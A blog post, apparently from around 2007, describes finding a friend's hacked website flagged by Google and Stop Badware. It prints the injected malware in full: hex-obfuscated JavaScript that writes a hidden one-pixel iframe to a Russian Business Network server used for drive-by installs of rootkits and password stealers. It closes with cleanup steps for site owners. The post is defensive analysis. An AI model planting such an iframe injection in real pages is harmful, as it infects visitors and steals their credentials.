Home » Blog » Berkman » Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center

Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center

About a week ago, I was writing a blog post and wanted to link to a friend’s personal site. I wanted to make sure I got the link right, so I googled her name. I was surprised to discover that Google wouldn’t let me connect directly to her site – instead, under the description of her site as the warning “This site may harm your computer”.

I’d seen the “this site may harm your computer” message before. Several of my colleagues at Berkman are involved with a project and website called Stop Badware. It’s the brainchild of my friend Jonathan Zittrain, who is deeply concerned that the “generativity” of internet-connected PCs might lead to an environment so dangerous that users will switch to less-generative, single purpose Internet devices. (Zittrain’s excellent paper on generativity is here, and I’ve written previously on generativity and Stop Badware here.) Stop Badware maintains a catalog of sites that have been reported to distribute “badware”, which they describe as “…malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. ”

Google identifies sites that they believe are spreading badware and registers them with Stop Badware. My colleagues with Stop Badware have the unenviable task of managing the Google review process – if a site is tagged as spreading badware, the site’s administrator has the option of protesting and having the site reviewed by a team that includes folks at the Berkman Center. This is a very emotional issue for site owners, as having your site de-listed by Google can have very serious consequences for your traffic, your reputation, etc.

So what was my friend’s site doing on Google’s badlist? She doesn’t distribute software of any sort. Clearly some sort of mistake had been made. I wrote a snippy letter to my friends at Berkman, cc’d it to Zittrain and titled the missive, “Not the best day for Stop Badware”.

Of course, I was the one who’d made the mistake. Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:


script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:


< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So has my friend begun working for Russian/Panamanian black hat hackers? It’s pretty unlikely – she’s just not that sort of gal. So, how’d the code get onto her otherwise innocent website?

Simply put, it was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

It’s great that Google is proactively searching for these dangerous bits of code, but it would be much, much better if they were also alerting owners of these compromised sites. When the program began, the logic – as I understand it – is that using site registration information (via whois) and alerting the contacts for a site would probably result in sites being thrown off their servers before they had a chance to appeal the decisions. That might have been a good call when most of the folks getting tagged for spreading malware were knowing distributors of the evil stuff. But in a world where lots of folks are having their sites hacked and are spreading malware unconsciously, it would be a really, really good idea to alert people who’ve been tagged by Google. In this case, both the tech and admin contacts for the site were legit, working email addresses and my friend would have been able to remove the offending code much more quickly than by having me discover it via Google.

How widespread is this new attack? That’s not clear – Stop Badware now has over 45,000 reports on URLs which Google or other partners have identified as distributing badware – my friends within the project report that daily reports of new sites have increased 300% over the past few weeks, suggesting there may be a wave of this sort of server compromise.

If your site is identified as spreading malware by Google and you think you’re experiencing this problem, do the following:

– Use the “view source” function on your browser and look at the source of the indexed pages of your site. If you find an obscured javascript like the one posted above, then there’s a good chance you’re in the same circumstances as my friend.

– Edit your html pages to remove the offending code.

– Change your password on your hosting account, making sure you’re using a secure password.

– Alert your hosting provider so they can be sure their software is patched and the attackers weren’t exploiting a known software hole.

– Visit the StopBadware site and use the “request a review” form to have them reexamine your site and remove the block. DON’T DO THIS UNTIL YOU’VE REMOVED ANY OFFENDING CODE, or you’re wasting your time and theirs.

These sorts of attacks are also reminders for Windows users that you can inadvertently install really nasty software on your machine even if you don’t open email attachments. Please, please keep your Windows installation patched and up to date, and consider using the Firefox browser. Some of these attacks take advantage of specific features in the Internet Explorer browser to allow the hostile code to load on your machine.

There’s a brief interview with Jonathan Zittrain in January’s Wired magazine, where the interviewer (Lucas Graves) is skeptical about JZ’s concerns about malware forcing users off PCs and onto less generative devices. Graves notes, “Things would have to get pretty damn bad to make us abandon our PCs.” JZ mentions that they could, indeed, get really bad. Hacked webservers that install code on unsuspecting that turns your PC into a zombie for spam relaying and other attacks? Maybe JZ’s more prescient than I thought…

69 thoughts on “Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center”

  1. Pingback: Lex Ferenda » Swimming with the fishies

  2. What about blogs (mine is WordPress) that get the huge long javascript code inserted, but you can’t see the code at all under admin, but in view source only?
    The script displays ads and porn ads…. this also happened on another page that is outside the blog, but connected. Had to rename the page, but the code does not show when you open it in text or dreamweaver…

  3. here. It’s great to link to Ethan Zuckerman so I’ll do it again as I did in that post: read this (still) great post. The related questions of defamation and search engine immunity are both

  4. here. It’s great to link to Ethan Zuckerman so I’ll do it again as I did in that post: read this (still) great post. The related questions of defamation and search engine immunity are both ???

  5. halocollection.com home page has the same IFame, and tries to download something from IP that belongs to LUGLINK from Russia
    this is the first line of code there

  6. How can I have the Harmful warning removed from my website that is clean? This warning has been on my site for over 20 days and Iâ??ve contacted stopbadware.org 3x with no response

  7. halocollection.com home page has the same IFame, and tries to download something from IP that belongs to LUGLINK from Russia
    this is the first line of code there

  8. What about blogs (mine is WordPress) that get the huge long javascript code inserted, but you can’t see the code at all under admin, but in view source only?
    The script displays ads and porn ads…. this also happened on another page that is outside the blog, but connected. Had to rename the page, but the code does not show when you open it in text or dreamweaverâ€

  9. There are so many ways to attack a website, it’s just not possible to cater for them all on a constant basis if you’re a small company, so the next best thing is to try and cover the most commonly found holes like the ones described in this article, and hope that puts off the intended attacker.

    We use an automated file system scanner called Eyefile. It’s good for detecting any kind of backdoor injection and works for any kind of website.

    It can be found here:
    http://www.website-security-tools.com/

    Hope this helps.

Comments are closed.